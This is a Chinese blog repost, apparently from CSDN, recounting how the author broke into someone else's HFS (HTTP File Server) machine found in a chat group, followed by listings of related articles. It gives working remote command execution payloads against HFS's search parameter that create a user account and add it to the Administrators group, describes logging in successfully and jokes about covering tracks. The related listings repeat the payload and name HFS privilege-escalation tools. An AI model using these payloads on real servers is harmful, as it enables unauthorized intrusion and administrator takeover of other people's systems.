HFS远程命令执行漏洞入侵抓鸡黑阔服务器

最新推荐文章于 2024-06-14 15:28:19 发布
最新推荐文章于 2024-06-14 15:28:19 发布
阅读量1.4k 收藏 2
点赞数
文章标签: shell
原文链接:http://www.cnblogs.com/xishaonian/p/6218170.html
版权

先来科普一下:

HFS是什么?

hfs网络文件服务器 2.3是专为个人用户所设计的HTTP档案系统,如果您觉得架设FTP Server太麻烦,那么这个软件可以提供您更方便的网络文件传输系统,下载后无须安装,只要解压缩后执行 hfs.exe,于「Virtual File System(虚拟档案系统)」窗格下按鼠标右键,即可新增/移除虚拟档案资料夹,或者直接将欲加入的档案拖曳至此窗口,便可架设完成个人HTTP网络文件服务器。 

 

 

故事开始了。

今天尼古拉斯四哥在群里发来那么一个IP

打开看了一下。是传说中的抓鸡神器.HFS,如下图所示:

 

其实HFS有一个命令执行漏洞。

Payload:

http://127.0.0.1/?search==%00{.exec|cmd /c net user DEF DEFHACKER123 /add.} 
http://127.0.0.1/?search==%00{.exec|cmd /c net localgroup Administrators DEF /add.}

 执行后是这样的效果。

 

成功登录!

黑客的工具

然后黑客给我发来了一个消息

哈哈,是四哥发的,如果真是管理员早给关了我账户了。礼尚往来的我也给他发了一个。

四哥的恶作剧。

 

我给后面悄悄加了一句。

本想通过逆向把黑客的马场日穿。然而让四哥逆向弄,弄半天没弄好。改日续集吧。

记得擦屁股否则黑客的DDOS攻击可是很猛烈的。

 结束

 

转载于:https://www.cnblogs.com/xishaonian/p/6218170.html

aiquan9342
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
HFS远程命令执行漏洞复现
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
05-28 5591
漏洞程序下载地址:Http File Server 这里说一下,再Windows server 2003中复现时,我直接使用Administrator用户登录,然后复现,未出现权限问题。再Windows 10中尝试复现时发现权限不足,需要以管理员权限执行漏洞程序。 运行程序截图如下 尝试访问该软件提供的web服务 web服务是这个样子的,这个web服务的搜索处存在漏洞 一、手工利用 payload如下 http://127.0.0.1/?search==%00{.exec|cmd /c 此处替换为dos
远程执行_HFS远程命令执行漏洞复现
weixin_42315338的博客
01-15 290
这里说一下,在Windows server 2003中复现时,我直接使用Administrator用户登录,然后复现,未出现权限问题。再Windows 10中尝试复现时发现权限不足,需要以管理员权限执行漏洞程序。漏洞程序下载地址见评论运行程序截图如下尝试访问该软件提供的web服务web服务是这个样子的,这个web服务的搜索处存在漏洞一、手工利用payload如下http://127.0.0.1/?...
HFS 2.3x 远程命令执行漏洞 讲解
weixin_65409651的博客
05-01 312
运行程序截图如下尝试访问该软件提供的web服务web服务是这个样子的,这个web服务的搜索处存在漏洞
HFS Cmd执行漏洞入侵与防御
u010005482的专栏
09-19 5549
最近爆出了HFS(Http File Server)爆出了这个漏洞
HFS远程命令执行漏洞(RCE)
weixin_30527323的博客
03-20 3222
一、HFS漏洞 1、影响版本 : 2.3c以前的2.3x版本 2、HFSHFS是HTTP File Server,国外的一款HTTP 文件服务器软件,简单易上手。 3、漏洞描述: HTTP File Server是一款专为个人用户所设计的HTTP文件服务器,它提供虚拟档案系统,支持新增、移除虚拟档案资料夹等。 Rejetto HTTP File Server 2.3c及之前版本中的...
HFS~网络文件服务器
07-27
HFS~网络文件服务器】是一款专为局域网设计的文件分享系统,它使得用户能够在局域网内部轻松地实现文件的共享与传输。这款软件以高效、易用为特点,极大地简化了网络文件服务的搭建过程,使得即便是没有专业IT背景...
HFS2.3漏洞利用.rar
12-28
总结一下,HFS2.3的漏洞主要体现在代码审核不足,导致可能的权限提升和远程服务滥用。这个压缩包中的“HFS2.3攻击器.exe”可能是一个恶意工具,用于测试或利用这个漏洞。防范措施包括软件更新、密码管理、安全服务的...
HFS提权工具,hfs漏洞提权软件
12-10
HFS提权工具,hfs漏洞提权软件
hfs本地快捷建立FTP服务器
02-23
HFS本地快捷建立FTP服务器】知识详解 在IT领域,文件共享是日常工作中不可或缺的一环,而FTP(File Transfer Protocol)服务器则是实现这一目标的重要工具。FTP允许用户通过网络在不同计算机之间传输文件,HFS...
hfs网络文件服务器中文版
08-25
hfs网络文件服务器官方版是款针对个人用户打造的HTTP文件服务器工具。...并且hfs网络文件服务器只要执行hfs.exe于Virtual File System虚拟文件系统窗格下按鼠标右键,即可新增/移除虚拟文件资目录等操作。
HFS修复漏洞
09-20
HFS修复漏洞
红泪HFS提权
06-03
HFS提权工具
hfs提权 2.3b之前
02-03
简易提权 有弹窗 HFS2.3B以前漏洞提权.exe
国外软件HFS 2.3x 远程命令执行漏洞 (本程序某些YY黑阔大牛抓鸡抓IP工具中使用到本软件)本站教程教习如何梨园远程命令执行。。中国寒龙...
weixin_30537391的博客
09-07 608
这个程序在国内用的特别多,特别是那些抓肉鸡的黑阔。 1 2 http://localhost:80/?search==%00{.exec|cmd.} http://localhost:80/search=%00{.exec|cmd.} 注:有些版本search前面是没有?的。 测试部分:百度搜HFS默认就是2.3...
HFS文件服务器RCE 漏洞复现(CVE-2024-23692)
huangyongkang666的博客
06-11 1650
Rejetto HFS是一款简单易用的Web文件服务器,可通过网络或互联网共享文件。该软件创建了一个Web界面,让用户可以直接在运行HFS软件的机器上上传或下载文件,在最新的Rejetto HTTP文件服务器HFS)2.x版本中,发现了一个严重的安全漏洞,标记为CVE-2024-23692HFS 版本 2.4.0 RC7 和 2.3mCVE-2024-23692漏洞特别影响 HFS 版本 2.4.0 RC7 和 2.3m。根本原因在于服务器处理用于呈现 HTTP 响应的默认模板的方式。
CVE-2024-23692:Rejetto HFS 2.x 远程代码执行漏洞[附POC]
最新发布
薛定谔嘚喵博客
06-14 861
Rejetto HTTP文件服务器是一个轻量级的HTTP服务器软件,它允许用户在本地计算机上快速搭建一个文件共享服务。2024年6月,互联网上披露其 2.x系列 存在CVE-2024-23692 远程代码执行漏洞,该漏洞源于存在模板注入漏洞,允许远程未经身份验证的攻击者通过发送特制的HTTP请求在受影响的系统上执行任意命令
Apache OFBiz 路径遍历导致RCE漏洞
weixin_43167326的博客
06-05 607
WordPress CMS 上的网站数以亿计,该平台及其用户称为威胁行动者的庞大攻击面,因此常常是恶意攻击的目标。其中很多攻击通过插件安装恶意软件,轻松导致数千个甚至数百万个站点易遭攻击。攻击者还倾向于快速利用WordPress 中发现的漏洞
渗透之——Metasploit攻击HFS 2.3上的漏洞
冰河的专栏
01-12 6272
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86358284 攻击机: kali 192.168.109.137 靶机: windows server 2012 192.168.109.141 工具:Metasploit 根据CVE-2014-6287的描述,Rejetto网络文件服务器(也被称为HSF或者HttpFi...
hfs网络文件服务器工具
07-03
### 回答1: HFS(HTTP File Server)是一款简单易用的网络文件服务器工具。它基于HTTP协议,可以将本地计算机上的文件共享给其他用户通过网络访问和下载。HFS具有以下特点和功能: 1. 简单易用:HFS拥有友好的用户界面和直观的操作流程,即使对于非技术人员也能轻松上手使用。只需在本地计算机上安装并运行HFS,即可通过浏览器访问和管理文件。 2. 快速稳定:HFS采用的是轻量级的HTTP服务器,其设计初衷是为了提供快速、可靠的文件共享服务。相比其他文件服务器工具,HFS在文件传输和访问速度方面具有明显优势。 3. 安全性:HFS支持基本的用户认证和权限控制。管理员可以设置访问密码,并指定不同用户的访问权限,确保文件只能被授权用户访问。 4. 多种访问方式:HFS支持多种访问方式,包括浏览器访问、FTP访问和文件夹映射等。用户可以根据自己的需求选择最合适的访问方式进行文件的上传、下载和管理。 5. 自定义性:HFS提供了各种自定义设置选项,用户可以根据自己的需求对文件服务器进行个性化配置。可以设置默认主页、添加自定义页面、更改界面样式等。 总之,HFS是一款功能强大、易用性高的网络文件服务器工具。它为用户提供了方便快捷的文件共享和访问方式,并保证了传输的安全性和稳定性。无论是个人用户还是小型团队,都可以通过HFS轻松实现文件的在线共享和管理。 ### 回答2: HFS(HTTP File Server)是一种网络文件服务器工具,它允许用户通过浏览器访问和下载文件。这个工具使用简单,并且不需要进行复杂的服务器设置。 HFS支持常见的文件操作,包括建立文件夹、上传文件、删除文件和重命名文件等等。用户可以将目标文件夹设为根目录,从而共享根目录下的所有文件和文件夹,或者将其设为独立的文件夹,实现特定文件的共享。 该工具的一个重要功能是权限设置。通过设置用户名和密码,用户可以限制对特定文件或文件夹的访问。这对于私人分享文件或公司内部使用非常有用。此外,HFS还支持IP白名单和黑名单,以进一步限制对服务器的访问。 另一个HFS的特点是支持虚拟文件系统。这意味着用户可以将文件夹映射为虚拟文件系统,并向用户提供一个统一的界面,从而方便了文件的管理和访问。 HFS还提供了一些附加功能,如日志记录和限制下载速度。日志记录功能可以帮助用户跟踪对服务器的访问情况,而限制下载速度可以避免服务器过载或网络拥塞的问题。 总之,HFS是一款简单实用的网络文件服务器工具,无论是个人用户还是企业用户,都可以通过它轻松地搭建一个文件共享平台。它的易用性、权限设置和虚拟文件系统功能,使得文件的管理和访问变得更加便捷和安全。 ### 回答3: HFS(Http File Server)是一款简单易用的网络文件服务器工具。它基于HTTP协议,可以在局域网或互联网上快速地进行文件共享。 使用HFS可以通过浏览器访问远程的文件和文件夹,并且可以进行上传、下载和管理文件的操作。它支持多种文件类型的在线预览,比如文本文件、图片、音频和视频等。 HFS具有以下几个特点: 1. 轻量级:HFS的安装包非常小巧,运行起来占用系统资源很少,可以在低配置的计算机上快速运行。 2. 安全性:HFS具有身份验证和权限设置功能,可以限制特定用户或群组对某些文件的访问权限,保护文件的安全性。 3. 易于使用:HFS提供了简洁的界面和直观的操作方式,即使对于没有网络知识的用户也能够轻松上手。 4. 自定义设置:HFS支持用户自定义界面风格和文件夹的图标,可以根据个人喜好进行设置,使使用者感到舒适和便捷。 5. 快速传输:HFS使用HTTP协议,并采用多线程方式传输文件,大大提高了文件传输的速度和效率。 总之,HFS是一款功能强大、易用且安全可靠的网络文件服务器工具。无论是在家庭环境中与家人共享文件,还是在企业中共享文件资源,它都能够满足用户的需求。它的简洁易用的特点使得任何人都可以轻松地搭建自己的文件服务器,并实现文件的快速访问和传输。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值